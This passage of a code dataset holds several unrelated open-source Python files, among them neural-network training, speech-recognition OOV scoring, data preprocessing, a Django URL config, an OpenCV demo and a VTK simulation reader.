as plt\nimport math\nimport os\nimport sys\nfrom FORCE import FORCE\n\n# This py-file initalizes parameters and then runs the FORCE-learning process\ndat = np.load('data/data_alpha0.57.npy')/250\n\n# command-line argument to set output-dir\nindex = int(sys.argv[1])\n# learning repetitions of the FORCE-learning process\nreps = 40\n# Number of units in FORCE network\nN = 1600\n# Number of units from FORCE-network connected to the read-out units\nnRec2Out = N\n# time-step of learning process\ndt = 0.12\n# seconds in recording data time (two time-steps in CCM-simulation process are 0.0005 seconds apart)\nnsecs = int(0.0005*reps*len(dat))\n# Factor setting the initial activity in the FORCE-network (prior to learning)\n# for further information see the explanation of g in the publication \n# of schwalger et. Al (Generating Coherent Patterns of Activity from Chaotic Neural Networks)\ng = 1.5\n# connection probability of units in FORCE-network c\np = 1\n# This factor is used to scale the initial connection strength to the total number of connections \nscale = 1/math.sqrt(p*N)\n# The number of FORCE-sub networks (#Number of learning functions)\n# One cortical column has 8 populations therefore here it is 8\npop_count = dat.shape[1]\n\nsimtime = np.linspace(0,nsecs,num=(len(dat)*reps))\n\n# popV = population vector. Each population has one popV with entries that are either 1 if unit is assigned to that population\npopV = np.zeros((pop_count,N,1))\n\nfor i in range(pop_count): \n popV[i,(N//pop_count)*i:(N//pop_count)*(i+1)] = np.ones_like(popV[i,(N//pop_count)*i:(N//pop_count)*(i+1)])\n\nIstim = np.zeros(len(simtime))\nft = np.array([np.tile(dat[:,i],reps) for i in range(pop_count)])\n\n# time in seconds of stimulation onset\nstimOnTime = 0.1\n# time in seconds of stimulation off\nstimOffTime = 0.16\n\nfor i in range(len(simtime)):\n if int(stimOnTime/0.0005) < i%len(dat) pd.DataFrame:\n cols = list(df_ts.columns.drop(lbl_cols))\n total_df = pd.DataFrame()\n for period in df_ts['Period'].unique():\n period_df = df_ts.loc[df_ts['Period'] == period].copy(deep=True) # Get period data\n for ft_col in cols:\n roll = period_df.groupby(['Id', 'Period'])[ft_col].rolling(window_len)\n ma = roll.mean().shift(lag).reset_index(0, drop=True)[period]\n period_df[ft_col] = ma\n period_df = period_df.dropna().reset_index(drop=True)\n total_df = pd.concat([total_df, period_df], axis=0)\n return total_df","repo_name":"thecml/fall-risk-assessment","sub_path":"src/tools/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13770811108","text":"import sys\nimport numpy as np\nimport os\n\n#oov_symbol_file = sys.argv[1]\nwords_file = sys.argv[1]\nref_ctm = sys.argv[2]\nOOV_cand_folder = sys.argv[3]\n#num_jobs = int(sys.argv[4])+1\n#print(str(num_jobs))\n\nphoneme_indices = []\n\ndef find_all(a_str, sub):\n\tstart = 0\n\twhile True:\n\t\tstart = a_str.find(sub, start)\n\t\tif start == -1: return\n\t\tyield start\n\t\tstart += len(sub)\n\n#for line in open(oov_symbol_file, \"r\"):\n#\toov_symbol = line.split()[0]\n#\tprint(\"OOV SYMBOL: \" + oov_symbol)\n\nfor line in open(words_file, \"r\"):\n\tif line[0:4] == 'PHN_':\n\t\tphoneme_indices.append(line.split()[1])\n\tif line.split()[0] == \"\":\n\t\toov_symbol = line.split()[1]\n\tif line.split()[0] == \"\":\n\t\tphnsilsp_symbol = line.split()[1]\nprint(\"phoneme indices: \") \nprint(phoneme_indices)\nprint(\"OOV and phnsilsp 
symbols:\")\nprint(oov_symbol + \" \" + phnsilsp_symbol)\n\nref_start = 1\n#ref_oov = []\n\n#for i in range(1, num_jobs):\n#\tprint ref_ctm_path\nref_ctm_file = open(ref_ctm, \"r\")\nfor line in ref_ctm_file:\n\tspl = line.split()\n#\t\tprint(spl[4])\n\tif spl[3] == oov_symbol: #unk found in reference\n\t\tif ref_start == 1:\n\t\t\tref_oov = np.array([spl[0], spl[1], spl[2], 0])\n\t\t\tref_start = 0\n\t\telse:\n\t\t\tref_oov = np.vstack((ref_oov, [spl[0], spl[1], spl[2], 0]))\n#\t\t\tprint(ref_oov)\nprint(\"REF OOVS: \" + str(len(ref_oov)))\n#print(ref_oov)\n\nin_unk = 0\ntotal_score = 0\ntotal_unks = 0\nusek_ready = 0\npred = ''\n#total_phone_string_duration = 0\n\n#for i in range(1, num_jobs):\nfor candidate in os.listdir(OOV_cand_folder):\n\ttotal_unks = total_unks + 1\n#\thyp_ctm_file = open(hyp_ctm_path + \"/ctm.\" + str(i), \"r\")\n\tprint(candidate)\n\tunderscores = list(find_all(candidate,\"_\"))\n#\tfor line in hyp_ctm_file:\n#\t\tprint(line)\n#\t\tspl = line.split()\n#\t\tprint(spl[4])\n#\t\tif spl[4] == oov_symbol:\n#\t\t\tif pred == oov_symbol or pred == phnsilsp_symbol:\n#\t\t\t\tprint(\"USEK READY CALCULATION SCORE\")\n#\t\t\t\tall_ref_unks = ref_oov[ref_oov[:,0] == filename]\n#\t\t\t\tprint(all_ref_unks)\n#\t\t\t\tbiggest_intersection = 0\n#\t\t\tusek_ready = 0\n#\t\t\tprint(line)\n\tfilename = candidate[underscores[0]+1:underscores[1]]\n\ttime_start = int(candidate[underscores[2]+1:underscores[3]])\n\ttime_end = int(candidate[underscores[3]+1:candidate.index(\".\")])\n\tprint(filename + \" \" + str(time_start) + \" \" + str(time_end))\n#\t\t\tprint(\"USEK READY CALCULATION SCORE\")\n#\t\t\tusek_ready = 0\n#\t\t\tin_unk = 0\n\tall_ref_unks = ref_oov[ref_oov[:,0] == filename]\n\tprint(all_ref_unks)\n\tbiggest_intersection = 0\n\tfor i in range(0, len(all_ref_unks)):\n\t\tprint(\"hyp time: \" + str(time_start) + \" \" + str(time_end))\n\t\tref_start_time = int(all_ref_unks[i,1])\n\t\tref_end_time = int(all_ref_unks[i,2]) #ref_start_time + int(all_ref_unks[i,2])\n\t\tprint(\"ref time: \" + str(ref_start_time) + \" \" + str(ref_end_time))\n\t\tintersection_start = max(time_start, ref_start_time)\n\t\tintersection_end = min(time_end, ref_end_time)\n\t\tintersection_duration = intersection_end - intersection_start\n\t\tif (intersection_duration > biggest_intersection): \n\t\t\trecall = intersection_duration / (ref_end_time - ref_start_time)\n\t\t\tprecision = intersection_duration / (time_end - time_start)\n\t\t\tf_score = (2 * precision * recall) / (precision + recall)\n\t\t\tbiggest_intersection = intersection_duration\n\t\t\tprint(\"Biggest intersection: \" + str(biggest_intersection))\n\t\t\tbiggest_int_index = i\n\tif biggest_intersection > 0:\n\t\tref_oov[np.where(np.all(ref_oov==all_ref_unks[biggest_int_index,:],axis=1)),3] = '1'\n\telse:\n\t\tf_score = 0\n\ttotal_score = total_score + f_score\n#\ttotal_phone_string_duration = total_phone_string_duration + phone_string_duration - 1\n#pred = spl[4]\n\nzeros_unks = ref_oov[ref_oov[:,3] == '0']\nnum_unfound = len(zeros_unks)\nprint(\"UNFOUND OOVS: \" + str(num_unfound))\n#print(zeros_unks)\nprint(\"UNKS IN HYPOTHESIS: \" + str(total_unks))\n#print(\"AVERAGE PHONEME STRING DURATION: \" + str(float(total_phone_string_duration)/float(total_unks)))\nif total_unks == 0:\n\tav_score = 0\nelse:\n\tav_score = float(total_score)/(float(total_unks)+float(num_unfound))\n#\tprint(\"AVERAGE PHONEME STRING DURATION: \" + str(float(total_phone_string_duration)/float(total_unks)))\n#\nprint(\"average f_score: \" + 
str(av_score))\n","repo_name":"BUTSpeechFIT/OOV-recovery-in-hybrid-ASR-system","sub_path":"utils/oov_detection_score_all_paths_ttt.py","file_name":"oov_detection_score_all_paths_ttt.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"34481866364","text":"def solution(a, b):\n start = 0\n end = 0\n if(a==b):\n return a\n elif(a>b):\n start = b\n end = a\n else:\n start = a\n end = b\n \n answer = start\n \n while(start != end):\n start += 1\n answer += start\n\n return answer","repo_name":"LouisKimDev/CodeTest","sub_path":"프로그래머스/lv1/12912. 두 정수 사이의 합/두 정수 사이의 합.py","file_name":"두 정수 사이의 합.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32025616551","text":"# Uses python3\nimport sys\n\n\ndef fib_last_digit(n):\n if n <= 1:\n return n\n\n prev = 0\n cur = 1\n\n for _ in range(n - 1):\n prev, cur = cur % 10, (prev + cur) % 10\n\n return cur\n\n\ndef fibonacci_sum_quick(n):\n last = fib_last_digit((n + 2) % 60)\n\n if last == 0:\n return 9\n else:\n return last - 1\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n print(fibonacci_sum_quick(n))\n","repo_name":"avmi/algorithmic-toolbox","sub_path":"week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/fibonacci_sum_last_digit.py","file_name":"fibonacci_sum_last_digit.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31726284166","text":"from string import ascii_lowercase\n\ndef characterFrequency(input):\n dictionary = {}\n for char in input:\n if char in dictionary:\n dictionary[char] += 1\n elif char != ' ':\n dictionary[char] = 1\n\n return dictionary\n\ndef uniqueDictionary(answers):\n temp = {}\n for char in ascii_lowercase:\n good = True\n for answer in answers[:-1]:\n if char not in answer:\n good = False\n\n if good:\n temp[char] = 1\n return temp\n\ndef countQuestions(questions):\n count = 0\n for question in questions:\n characterCount = characterFrequency(question)\n count += len(characterCount)\n\n return count\n\ndef countUniqueQuestions(questions):\n count = 0\n for question in questions:\n per_person = question.split(' ')\n answers = []\n for person in per_person:\n answers.append(characterFrequency(person))\n\n uniqueAnswers = uniqueDictionary(answers)\n count += len(uniqueAnswers)\n \n return count\n\n# Open data file and add data to list.\n# data_passport has each entry per passport.\ndata_file = open(\"advent_of_code_2020/day_6/data.dat\", \"r\")\ndata_raw = data_file.read().split('\\n')\n\n# Combine individual fields into passports.\nlast_i = 0\ndata_lines = []\nfor i in range(len(data_raw)):\n if data_raw[i] == '' or i==len(data_raw)-1:\n content = ''\n for j in range(last_i, i):\n content += data_raw[j] + ' ' \n\n data_lines.append(content)\n last_i = i+1\n\n## PART 1 ##\nprint(countQuestions(data_lines))\n\n## PART 2 ##\nprint(countUniqueQuestions(data_lines))","repo_name":"JustAdamHere/AdventOfCode2020","sub_path":"day_6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30637417894","text":"import matplotlib.pyplot as plt\nimport pandas.io.data as web\nimport datetime as dt\nimport pandas as pd\n\nfrom blvutils.finance import 
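fibonacci_sum_quick above leans on two facts: sum(F_0..F_n) = F(n+2) - 1, and the last digits of Fibonacci numbers repeat with period 60 (the Pisano period mod 10). A brute-force cross-check, assuming the two functions from that file are in scope:

def fib_sum_last_digit_naive(n):
    # O(n) direct summation, for verification only.
    prev, cur, total = 0, 1, 0
    for _ in range(n + 1):
        total += prev
        prev, cur = cur, prev + cur
    return total % 10

assert all(fib_sum_last_digit_naive(n) == fibonacci_sum_quick(n) for n in range(500))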
to_log_returns\n\n\nYESTERDAY = dt.datetime.today() - pd.DateOffset(days=1)\nSTART = YESTERDAY - pd.DateOffset(years=2)\n\n\ndef remove_consecutive_values(series):\n result = series.dropna()\n result[result.shift(1) == result] = None\n return result.dropna()\n\n\ndef get_benchmark_return(code=\"^SSMI\"): # pragma: no cover\n \"\"\"Adj Close = close price adjusted for dividends and splits\n\n \"\"\"\n sp500 = web.DataReader(name=code,\n data_source=\"yahoo\",\n start=START,\n end=YESTERDAY)\n result = to_log_returns(sp500['Adj Close'])\n return result.sum()\n\n\ndef plot_returns_with_signals(data, signals): # pragma: no cover\n fig = plt.figure()\n ax1 = fig.add_subplot(211, ylabel='ALPHA')\n cum_alpha = data['alpha'].cumsum()\n cum_alpha.plot(ax=ax1, color='b', lw=2.)\n\n buy = signals[signals == True]\n sell = signals[signals == False]\n\n ax1.plot(buy.index, cum_alpha[buy.index], '^', markersize=20, color='g')\n ax1.plot(sell.index, cum_alpha[sell.index], 'v', markersize=20, color='r')\n fig.set_size_inches(28, 35)\n plt.show()\n","repo_name":"matwrob/blvresearch","sub_path":"concat/signals/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1436418673","text":"#import time\n\nfrom meerkat.base import time, _struct_time, Base\n\n\nclass TimePiece(Base):\n \"\"\"Formatting methods for creating strftime compliant timestamps\n\n Data sources: 'local', 'rtc', 'gps', 'external'\n Data kinds: 'std_time', std_time_ms', 'iso_time', 'file_time', 'gps_location', 'external'\n \"\"\"\n def __init__(self, source='local', kind='std_time_ms', time_zone=None):\n\n super().__init__()\n\n self._import_error = []\n self._struct_time = _struct_time\n\n self.kinds_available = {'std_time': '%Y-%m-%d %H:%M:%S',\n 'std_time_ms': '%Y-%m-%d %H:%M:%S.%f',\n 'iso_time': '%Y-%m-%dT%H:%M:%S.%f%z',\n 'file_time': '%Y_%m_%d_%H_%M_%S',\n 'gps_location': 'NMEA RMC message format',\n 'external': 'external source'\n }\n self.source = None\n self.set_source(source)\n \n self.kind = kind\n self.time_format = None\n #self.set_format(kind)\n\n # optional timezone\n self._tz = None\n self.tz = time_zone\n\n # external hardware time sources, must be set after initialization\n self.rtc = None\n self.gps = None\n\n # external time string, generated by another instance or external source\n self._external_time = None\n\n @property\n def tz(self):\n return self._tz\n\n @tz.setter\n def tz(self, time_zone):\n if time_zone is None:\n self._tz = ''\n else: self._tz = time_zone\n\n def set_source(self, source):\n \"\"\"Override default time source\n Must be one of the following: 'local', 'rtc', 'gps', 'external'\n \"\"\"\n assert source in ['local', 'rtc', 'gps', 'external'], f'Source `{source}` not supported'\n self.source = source\n\n def set_kind(self, kind):\n \"\"\"Override default time output format. Must be one of the\n the following (from self.formats_available):\n 'std_time',\n 'std_time_ms',\n 'iso_time',\n 'file_time',\n 'gps_location',\n 'external' # time_format from external timepiece instance\n \"\"\"\n assert kind in self.kinds_available.keys(), f'Kind `{kind}` not supported'\n self.kind = kind\n self.time_format = self.kinds_available[kind]\n\n def set_time(self, time_str):\n \"\"\"Set the returned string formatted time manually. Used for shared\n timestamps. 
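remove_consecutive_values above keeps the first element of every run of repeats by comparing a series against its own one-step shift; a quick illustration of the idiom (the None-assignment plus dropna in the original is equivalent to the boolean mask used here):

import pandas as pd

s = pd.Series([1, 1, 2, 2, 2, 3, 1])
print(s[s.shift(1) != s].tolist())  # [1, 2, 3, 1] -- runs collapse, later reappearances survive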
To be useful in post-collection analysis, set the format\n name with self.set_format to the same format as the input argument.\n\n Parameters\n ----------\n time_str : str, in one of the formats generated by this class, as\n listed by self.formats_available\n \"\"\"\n self._external_time = time_str\n\n def get_time(self):\n \"\"\"Get the time in a specific format. For creating a reproducible\n format citation based on the attributes of the TimeFormats class.\n\n Returns\n -------\n str, formatted current time based on input argument\n \"\"\"\n if self.source == 'external':\n return self._eternal_time\n if (self.source == 'gps') & (self.kind == 'gps_location'):\n return self.gps_location()\n if self.source == 'local':\n t = self._struct_time()\n if self.source == 'rtc':\n t = self.rtc_time()\n if self.source == 'gps':\n t = self.gps_time()\n\n _formats = {'std_time': '{:02d}-{:02d}-{:02d} {:02d}:{:02d}:{:02d}',\n 'std_time_ms': '{:02d}-{:02d}-{:02d} {:02d}:{:02d}:{:02d}.{:06}',\n 'iso_time': '{:02d}-{:02d}-{:02d}T{:02d}:{:02d}:{:02d}.{:06}' + self.tz,\n 'file_time': '{:02d}_{:02d}_{:02d}_{:02d}_{:02d}_{:02d}',\n }\n str_format = _formats[self.kind]\n return str_format.format(*t) # format doesn't like tuples, needs args\n\n def rtc_time(self):\n \"\"\"Get time from the DS3221 RTC\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n RTC time in std_time format\n \"\"\"\n t = self.rtc.get_time()\n return t[0], t[1], t[2], t[3], t[4], t[5], 0\n\n def gps_location(self):\n \"\"\"Get NMEA RMC message from the PA1010D GPS\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n GPS date, lat, lon and time in NMEA RMC format\n \"\"\"\n nmea_sentence = self.gps.get(nmea_sentences=['RMC'])[0]\n return nmea_sentence\n\n def gps_time(self, timeout=120):\n \"\"\"Get time from the PA1010D GPS\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n RTC time in iso_time format\n \"\"\"\n t0 = time.time()\n while True:\n t1 = time.time()\n try:\n nmea_sentence = self.gps_location()\n nmea_sentence = nmea_sentence.split(',')\n t = nmea_sentence[1].split('.')[0]\n t_ms = nmea_sentence[1].split('.')[1]\n t = [t[:2], t[2:4], t[4:]]\n d = nmea_sentence[9]\n d = ['20' + d[4:], d[2:4], d[:2]]\n return d[0], d[1], d[2], t[0], t[1], t[2], t_ms\n except:\n if t1 - t0 > timeout:\n return 'gps_timeout'\n continue\n\n def external_time(self):\n \"\"\"Return a previously set external time. 
Useful for synchronizing\n timestamps between data sources\"\"\"\n return self._external_time\n","repo_name":"crdietrich/meerkat","sub_path":"meerkat/data/timepiece.py","file_name":"timepiece.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"41200743872","text":"\"\"\"Reboot a Google device.\"\"\"\nfrom googledevices.helpers import gdh_session\n\n\ndef reboot(host, loop):\n \"\"\"Reboot a Google device.\"\"\"\n\n async def reboot_device(host, loop):\n \"\"\"Reboot a Google Home unit.\"\"\"\n from googledevices.api.cast.settings import Settings\n\n async with gdh_session() as session:\n googledevices = Settings(host, loop, session)\n await googledevices.reboot()\n\n loop.run_until_complete(reboot_device(host, loop))\n","repo_name":"ludeeus/googledevices","sub_path":"googledevices/cli/commands/reboot.py","file_name":"reboot.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"6040566249","text":"import logging\nfrom .exception import GeometryException\nfrom .blank import BlankGeometry\nfrom .unipuck import Unipuck\nfrom .unipuck_calculator import UnipuckCalculator\n\n\nclass Geometry:\n \"\"\" Provides access to the various sample plate geometry classes.\n \"\"\"\n NO_GEOMETRY = BlankGeometry.TYPE_NAME\n UNIPUCK = Unipuck.TYPE_NAME\n\n TYPES = [NO_GEOMETRY, UNIPUCK]\n\n _MSG_NOT_IMPLEMENTED = \"Geometry Type '{}' not implemented\"\n _MSG_UNKNOWN = \"Unknown Geometry Type: '{}'\"\n\n @staticmethod\n def get_class(geo_name):\n \"\"\" Get the geometry class based on its name. \"\"\"\n if geo_name == Geometry.NO_GEOMETRY:\n return BlankGeometry\n elif geo_name == Geometry.UNIPUCK:\n return Unipuck\n else:\n Geometry._raise_unknown(geo_name)\n\n @staticmethod\n def calculate_geometry(geo_name, slot_centers):\n \"\"\" Create a geometry object of the specified type and calculate its layout based on the set of\n known slot positions.\"\"\"\n if geo_name == Geometry.NO_GEOMETRY:\n return BlankGeometry(slot_centers)\n elif geo_name == Geometry.UNIPUCK:\n calculator = UnipuckCalculator(slot_centers)\n geometry = calculator.perform_alignment()\n return geometry\n else:\n Geometry._raise_unknown(geo_name)\n\n @staticmethod\n def get_num_slots(geo_name):\n \"\"\" Get the number of slots that a particular geometry type contains. 
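A hedged usage sketch for TimePiece above: one instance generates a stamp, a second 'external' instance is handed the same string so several data sources share a timestamp. Note that get_time's external branch returns self._eternal_time, which looks like a typo for self._external_time, so this sketch only stores the stamp and reads it back via external_time():

tp_logger = TimePiece(source='local', kind='file_time')
stamp = tp_logger.get_time()  # e.g. '2021_03_05_14_02_33'

tp_shared = TimePiece(source='external')
tp_shared.set_time(stamp)          # share one stamp across data sources
assert tp_shared.external_time() == stamp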
\"\"\"\n cls = Geometry.get_class(geo_name)\n return cls.NUM_SLOTS\n\n @staticmethod\n def _raise_not_implemented(geo_name):\n log = logging.getLogger(\".\".join([__name__]))\n log.debug(Geometry._MSG_NOT_IMPLEMENTED.format(geo_name))\n raise GeometryException(Geometry._MSG_NOT_IMPLEMENTED.format(geo_name))\n\n @staticmethod\n def _raise_unknown(geo_name):\n log = logging.getLogger(\".\".join([__name__]))\n log.debug(Geometry._MSG_UNKNOWN.format(geo_name))\n raise GeometryException(Geometry._MSG_UNKNOWN.format(geo_name))\n","repo_name":"DiamondLightSource/PuckBarcodeReader","sub_path":"dls_barcode/geometry/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"68"} +{"seq_id":"17552555679","text":"from django.urls import path,include\nimport views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom django.views.static import serve\nurlpatterns=[\n path('questions/',views.questions, name='questions'),\n path('my_questions/',views.my_questions, name='my_questions'),\n path('testsave/',views.testsave, name='testsave'),\n path('upload_file/',views.upload_file, name='upload_file'),\n path('download_file/',views.download_file, name='download_file'),\n url(r'^download_file/(?P.*)$',serve, {'document_root':settings.MEDIA_ROOT}),\n path('edit_questions//',views.edit_my_questions, name='edit_questions'),\n path('answers//',views.answers,name=\"answers\"),\n path('display_answers//',views.display_answers,name=\"display_answers\"),\n path('post/ajax/deletemypost',views.delete_my_post, name='deletemypost'),\n path('post/ajax/rateanswer',views.rate_answer, name='rateanswer'),\n path('get/ajax/check_ratingstatus',views.check_user_ratingstatus, name='check_ratingstatus'),\n path('get/ajax/search',views.search_result, name='search'),\n path('get/ajax/get_answer',views.get_answer, name='get_answer'),\n path('get/ajax/get_search_results',views.search_questions,name='get_search_results'),\n]\n\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"Rosella-n/resourcebank","sub_path":"resourcebank/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18441076253","text":"import cv2\nimport numpy as np\n\nimage = np.zeros((500, 500, 3), dtype=np.uint8)\n\n\ndef on_mouse(event, x, y, flags, userdata):\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(image, (x, y), 5, (0, 0, 255))\n elif event == cv2.EVENT_MBUTTONDOWN:\n cv2.rectangle(image, (x - 5, y - 5), (x + 5, y + 5), (0, 255, 0), 3)\n\n\ncv2.namedWindow(\"image\")\ncv2.setMouseCallback(\"image\", on_mouse)\n\nwhile True:\n cv2.imshow(\"image\", image)\n\n if cv2.waitKey(100) == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"arafalski/Systemy-wizyjne","sub_path":"Lab3/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70373495576","text":"import numpy as np\n# from vtk import vtkStructuredPointsReader\n# from vtk import vtkStructuredGridReader\nfrom vtk import vtkRectilinearGridReader\nfrom vtk.util import numpy_support as VN\nimport os\n\n\ndef pluto_vtk_to_numpy(filename, 
quantity_names, ordering):\n '''pluto_vtk_to_numpy(filename, quantity_names, ordering): \\\n loads a vtk as built by pluto \\\n (only for scalar output of quantities)\\\n and converts it to numpy array.\\\n \"ordering may be either \"C\" or \"F\"'''\n\n if (os.path.isfile(filename)):\n reader = vtkRectilinearGridReader()\n reader.SetFileName(filename)\n reader.ReadAllVectorsOn()\n reader.ReadAllScalarsOn()\n reader.Update()\n else:\n raise ValueError(\"File '\"+filename+\"' does not exist\")\n\n data = reader.GetOutput()\n\n dim = []\n for ii in data.GetDimensions():\n if ii > 1:\n dim.append(ii)\n\n x = VN.vtk_to_numpy(data.GetXCoordinates())\n y = VN.vtk_to_numpy(data.GetYCoordinates())\n z = VN.vtk_to_numpy(data.GetZCoordinates())\n\n u = []\n for qn in quantity_names:\n # I transform to numpy array the scalar/vector field (and reshape)\n u.append(VN.vtk_to_numpy(data.GetCellData().GetArray(qn)))\n\n # Number of cells per each dimension\n dim_cells = list(np.array(dim)-1)\n dim_quantity = dim_cells.copy()\n for ii in range(len(u)):\n try:\n dim_quantity.append(u[ii].shape[1])\n except IndexError:\n pass\n u[ii] = u[ii].reshape(dim_quantity, order=ordering).transpose()\n\n return u, x, y, z\n\ndef pluto_read_vtk_frame(pluto_dir, nframe=None, time=None, q_names=None):\n '''Reads a vtk dataframe which was written by pluto 4.2, only in non-vector mode.\n Returns a dictionary with the quantities, ND arrays of x,y,z positions and an int or a float\n containig the actual time and number of frame'''\n\n # Check if sim directory exists\n if not(os.path.isdir(pluto_dir)):\n raise ValueError(pluto_dir + ' is not a valid directory')\n\n vtklog_fi = os.path.join(pluto_dir,\"vtk.out\")\n nvtk, t_log, dt, nsteps, file_type, endianess, quantity_names = read_vtk_log(vtklog_fi)\n\n if nframe!=None and time==None:\n pluto_nframe = nframe\n idx = np.where(nvtk==nframe)[0]\n # Maybe this check is useless??\n # print(type(idx))\n if idx.size==0:\n raise ValueError(\"Frame {} not found in directory\".format(nframe)+\n \" \"+pluto_dir+\n \". 
Maybe vtk log file({}) is not up to date with the vtk files\".format(vtklog_fi)+\n \", or the vtk file is simply missing\")\n if len(idx)>1:\n print(\"More than one line in vtk.out for dump number {:d}\".format(nframe))\n print(\"I use the last one (i.e.: the line more down in the file)!\")\n idx = idx[-1]\n pluto_time = t_log[idx]\n elif nframe==None and time!=None:\n idx = np.argmin(np.abs(t_log-time))\n pluto_nframe = nvtk[idx]\n pluto_time = t_log[idx]\n else:\n raise ValueError(\"Specify either nframe or time, not both or none.\")\n\n # Names of the quantities (if not feeded as input)\n if q_names==None:\n # Use the names given by the log file (out/vtk.out)\n q_names = quantity_names[idx]\n\n # Path of the file to read\n vtk_basename = \"data.\"\n ordering = \"F\"\n vtk_finame = vtk_basename + '{:04d}.vtk'.format(pluto_nframe)\n vtk_fi = os.path.join(pluto_dir,vtk_finame)\n\n # Read\n u, x, y, z = pluto_vtk_to_numpy(vtk_fi, q_names, ordering)\n # Build the dictionary\n q = {q_names[ii]:u[ii] for ii in range(len(q_names))}\n\n return q, x, y, z, pluto_time, pluto_nframe\n\ndef read_vtk_log(vtklog_fi):\n '''Function to read pluto's vtk log files (vtk.out)'''\n\n with open(vtklog_fi) as log:\n lines = log.readlines()\n\n nvtk = []; t = []; dt = []; nsteps = []\n file_type = []; endianess = []\n quantity_names = []\n for line in lines:\n elements = line.strip().split()\n nvtk.append(int(elements[0]))\n t.append(float(elements[1]))\n dt.append(float(elements[2]))\n nsteps.append(int(elements[3]))\n file_type.append(elements[4])\n endianess.append(elements[5])\n quantity_names.append(elements[6:])\n\n return (np.array(nvtk),\n np.array(t),\n np.array(dt),\n np.array(nsteps),\n file_type,\n endianess,\n quantity_names)\n\nif __name__ == \"__main__\":\n pluto_vtk = '/home/ema/simulazioni/sims_pluto/I90/newtransp-rho20/out/data.0025.vtk'\n quantities = ['bx3']\n u, x, y, z = pluto_vtk_to_numpy(pluto_vtk, quantities, 'C')\n len(u)\n x.shape\n y.shape\n u[0].shape\n","repo_name":"emabre/plot_pluto","sub_path":"pluto_read_frm.py","file_name":"pluto_read_frm.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34509481844","text":"from datetime import datetime, date, time, timedelta\n#from time import sleep\nimport time\n\nnow = datetime.now()\ntime_lapse = (now.second)\n\n#global seconds\n\ndef timer():\n global seconds\n seconds = 0 \n \n while seconds != 180:\n # Sleep for a minute\n time.sleep(1)\n # Increment the minute total\n seconds += 1\n print(seconds)\n counter()\n\n return seconds\n\ndef counter():\n \n if seconds <= 5:\n print (\"Hecho\")\n \n else:\n print(\"Reset\")\n reset()\n\ndef reset():\n global seconds\n seconds = 0\n\ntimer()\n","repo_name":"fabiankmilo/API-Flora","sub_path":"Temporizador.py","file_name":"Temporizador.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73228634455","text":"#import json\n#from openmtc_scl.serializer import JsonSerializer\nfrom openmtc.scl import UpdateRequestIndication\nfrom aplus import Promise\nfrom futile.logging import LoggerMixin\nfrom urlparse import ParseResult, urlparse, urlunparse\n\n\nclass PA_Activation(LoggerMixin):\n def __init__(self, config, logger):\n self.config = config\n self.logger = logger\n self.logger.info(\"enable activate is %s\" % self.config.get(\"enable_activate\"))\n self.logger.info(\"activate path is %s\" % 
